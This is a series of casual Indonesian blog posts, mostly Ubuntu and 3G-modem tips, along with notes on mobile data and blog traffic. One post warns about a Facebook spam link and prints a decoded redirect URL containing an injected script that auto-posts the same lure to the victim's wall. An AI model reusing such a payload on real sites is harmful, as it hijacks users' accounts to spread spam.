Katrol-katrolan di dunia blogger buat hits tim jadi moncerrr…!!!

Kamsuddnya ???!!!! Sebenarnya sederhana saja teorinya Bro, jika Blog yang kita kelola memiliki hits yang tinggi, katakan lah sehari 100.000 hits maka dengan teknik KATROL kita dapat menaikkan hits Blog rekan kita.

Caranya :

Pada Blog nyang rame pengunjungnya, buat review mengenai blog yang hendak dikatrol, letakkan di halaman pertama, jika perlu dikunci untuk beberapa waktu sehingga setiap pengunjung yang datang ke Blog pada awal langsung melihat Blog yang direview , selanjutnya ketika selesai review sarankan yang hendak membaca untuk membaca secara lengkap dengan memberikan link kunjungan ke Blog tersebut, sooo tau sendirikan efeknya, kalau saja blog yang memuat review memiliki hits sehari 100.000 maka sederhana 1o% saja yang klik link berkunjung maka blog yang dikatrol sudah kedatangan kunjungan 10.000 😀 😀

Sederhana tapi Efektif….!!!

Iklan

Tautan jahil di Facebook

Semalam lihat di status dinding seorang teman yang menyertakan url seperti berikut berkali kali http://tinyurl.com/skandalanangsyahrini, penasaran saya klik, eeeehhh ternyata di dinding saya juga moencoelll 😀
Wedewwww.. akhirnya saya coba wget url tersebut dan hasilnya :

Location: http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’Video%20mesum%20skandal%20Anang%20Syahrini%20
http://tinyurl.com/skandalanangsyahrini’;document.forms[0].submit();}%3C/script%3E [following]–2011-03-30 15:41:36–  http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=
function()%7Bdocument.forms[0].message.value=’Video%20mesum%20skandal%20
Anang%20Syahrini%20http://tinyurl.com/skandalanangsyahrini’;
document.forms[0].submit();%7D%3C/script%3ER

Ternyata link jahil tersebut akan mengubah status kita sesuai dengan message.value diatas, implikasinya bagi yang penasaran tentu dia akan klik link tersebut berkali-kali karena hasil yang diharapkan tidak muncul, dan di dinding yang bersangkutan akan muncul status yang sama berkali-kali… wkwkwk jahillll abiezzzzz.

Bener-bener social enginerring…
Oke.. Jangan Asal klik, Semoga bermanfaat…

XL internet harian Goceng Gak rugilahhhh

Kenapa ane bilang begitu, gampang saja nih Buktinya :

7 Jam udah 500mb

meksen kan 7 jam 500 mb bayar Goceng, trus kecepatan turun gak..??? Nih skrinshut setelah 7 jam dan 500 mb

Tetap Josss ..!!!!

Masih Jossss walau udah abis 500 mb wkwkw.

~~~ Silahkan dicerna yooo.~~~

Kembali little tricky untuk ZTE 622 di Lucid Lynx

Setelah lama menggunakan ZTE 622 di Lucid, masih belum ketemu agar nih modem langsung bisa di load oleh Network Manager saat ditancepin tanpa perlu restart mesin. :-(. Nggak sengaja, akhir nya ada solusi.

yaitu saat mesin loading, tancepin sampai lampu hijau, trus cabut, dan tancepin lagi, nah ketika udah masuk ke desktop langsung tuh bisa jalanin via network manager…

~~~ Semoga bermanfaat ~~~

 

Upstream SNR, Downstream SNR

Selaku pelanggan Spedol ane agak hengran juga hari ini 21 Maret 2011, setelah mengalami problem sekitar pukul 13an s.d. 14.30an dan kembali normal saya menemukan walaupun upstream speed dan downstream speed tidak bermasalah tetapi lemotnya keras juga apa masalahnya ..???

Skrinsut modem cepedol

Setelah tanya-tanya kik google ternyata ade penyebab laen selain upstream speed dan downstream speed, yaitu Upstream SNR dan Downstream SNR, makluk apalagi..????

– S N R    : Signal to Noise Ratio : Rasio Antara kekuatan Sinyal dengan Gangguan (noise)

– Downstream SNR   : Menampilkan Nilai kekuatan sinyal pada modem kabel kita dibanding dengan gangguan(noise) pada line tersebut (sinyal/noise), semakin besar Gangguan maka nilai SNR semakin kecil sebagai akibat koneksi akan mengalami banyak hambatan, Nilai standarnya adalah 30, jika dibawah nilai tersebut hemmmm… udah pasti lemot dsb dsb dehhhh 😦

– Upstream SNR : Pengertian sederhananya adalah banyaknya sinyal yang sampai pada ujung kabel modem kita dibandingkan dengan tingkat kebisingan yang ada, Nilai yang baik adalah diatas 29, seperti juga Downstream SNR semakin besar noise semakin kecil nilai Upstream SNR

~~~ Semoga Bermanfaat ~~~

Pantau koneksi upstream dan downstream dengan Netspeed

Pengguna modem 3G di ubuntu tentu kadang bingung dengan kecepatan yang didapat saat koneksi dengan menggunakan modem tersebut, jika di sistem operasi Windows secara bawaab udah ada Aplikasinya dan terlihat kilobytenya, nak di ubuntu pun sesungguhnya juga sangat Gampang…. Caranya : ???

1. Buka terminal, install aplikasi netspeed dengan perintah sudo apt-get install netspeed

2. Setelah selesai Instalasi klik kanan pada panel Atas pilih add to panel

Add to Panel...

3. Muncul jendela Add to Panel, pada Kotak Find item… ketikan netspeed sehingga Akan terfilter applet Add to Panel

 

 

Netspeed @ Add to Panel

 

4. Klik Add maka applet akan muncul di panel atas Ubuntu :

 

Applet Netspeed

 

5. Untuk pengaturan tipe koneksi yang dipergunakan cukup klik kanan pada gambar telepon pilih Prefences..

~~~Semoga Bermanfaat ~~~

Lucid, Google chrome, Youtube

Pengguna Ubuntu Lucid Lynx tentu kenal baik dengan Google Chrome browser besutan Google dan juga pasti tahu dengan Youtube situs penyedia video yang terkenal.

Saya juga seperti itu, kadang ketika browsing ke menggunakan Chrome dan memutar video di Youtube muncul keinginan untuk mengunduh video tersebut, pakai Tools apa???

Di sinilah kenikmatan menggunakan Ubuntu 😀 , kenapa ??!!! Ya gak perlu install apa-apa kalau cuman pengen ngunduh video dari Youtube.

Caranya !!!!.

1. Buka Situs Youtube, putar video sampai selesai….

2. Browse ke direktori /home/namauser/.cache/google-chrome/Default/Cache
Cari berkas .flv (syarat jangan ditutup dulu yah Chromenya ketika sudah selesai pemutaran flv)

3. Akan terlihat berkas .flv tersebut dan silahkan salin ke folder lain

Gampang khannnn !!!!

~~~ Semoga Bermanfaat ~~~

Wammu juga bisa menangani modem GSM

Nggak kepikiran sama aplikasi satu ini, selama ini terpaksa mindahin kartu internet ke ponsel biar dapat mengaktifkan paket setelah isi pulsa untuk internet pada salah satu operator GSM di Indonesia. Ane menggunakan modem ZTE 622 ONDA ternyata dikenal baik oleh Wammu.

Ya udah bisa ternyata SMSan dan aktivasi paket dengan menggunakan Wammu sebagai Frontend.

1. Akses Wammu dari Applications->Accecories->Wammu

Tampilan Wammu

2. Secara default Wammu tidak akan otomatis melakukan koneksi pada ponsel yang kita miliki agar setiap kali menjalankan Wammu dan otomatis melakukan koneksi ke Ponsel maka dilakukan pengaturan melalui : Wammu -> Setting

Setting Wammu

Centang pilihan Automatically connect to phone on startup.

3. Untuk menyambungkan Modem dengan aplikasi Wammu itu sendiri dapat dilakukan dengan menggunakan Wammu->Phone Wizard jika kita ragu dapat memilih konfigurasi Automatically search a phone, ikuti saja prosesnya sehingga selesai ketika sama menggunakan modem ZTE 622 ONDA Wammu mengenalinya secara otomatis dan kita tinggal memberi nama pada akhir pengaturan modem tersebut oleh Wammu.

4. Setelah pengaturan selesai maka untuk menggunakan Modem tersebut layaknya ponsel untuk sms lakukan koneksi ke modem tersebut melalui menu Phone->Connect

5. Jika telah terkoneksi dengan baik untuk dapat membaca SMS lakukan penarikan data dari kartu sim melalui menu Retreive->Message

6. Untuk dapat membuat sms dan mengirim sms maka dilakukan melalui menu Create

Selanjutnya silahkan eksplorasi sendiri.

~~~ Semoga Bermanfaat ~~~

Option 322 a.k.a Quick Silver langsung ngacir di Maverick Merkaat

Pengguna Ubuntu yang udah familiar dengan Modem Option tentu sangat kenal dengan karakter modem Option yang selalu bikin hang mesin Ubuntu baik 255, 322, 505 dll ketika dicolokkan di mesin Ubuntu. Penulis sendiri juga merasakannya, mau gak mau harus instal driver hso.

Tetapi kemaren temen yang menggunakan Maverick Merkaat a.k.a Ubuntu 10.10 meminta instalkan modem option 322 a.k.a Quick Silver, iseng saja penulis langsung tancapkan modem tersebut dan ternyata mesin tidak hang dan sippp langsung bisa konfigurasi di Netwoork Manager, langsung konek dan ngaciiirrrrrrrr…..

~~~ Mantab Ubuntu. Semoga Bermanfaat  ~~~

Little bug with BlackOnda

Nah… sekarang baru ketahuan masalah BlackOnda setelah beberapa hari pakai :

My BlackOnda

Saat pertama dicolokkan kedalam port usb akan muncul galat :

block device /dev/sr1 is write-protected, mounting read-only
mount: wrong fs type, bad option, bad superblock on /dev/sr1,
       missing codepage or helper program, or other error
       In some cases useful info is found in syslog - try
       dmesg | tail  or so

Sebenarnya jika hanya menggunakan wvdial tidak akan menjadi masalah, langsung dikonekkan saja sudah oke.

Tapi karena saya maksa mesti pakai Network Manager maka list dari profile dari operator tidak akan muncul, solusinya mesti di restart mesin Lucidnya.

~~~Semoga Bermanfaat ~~~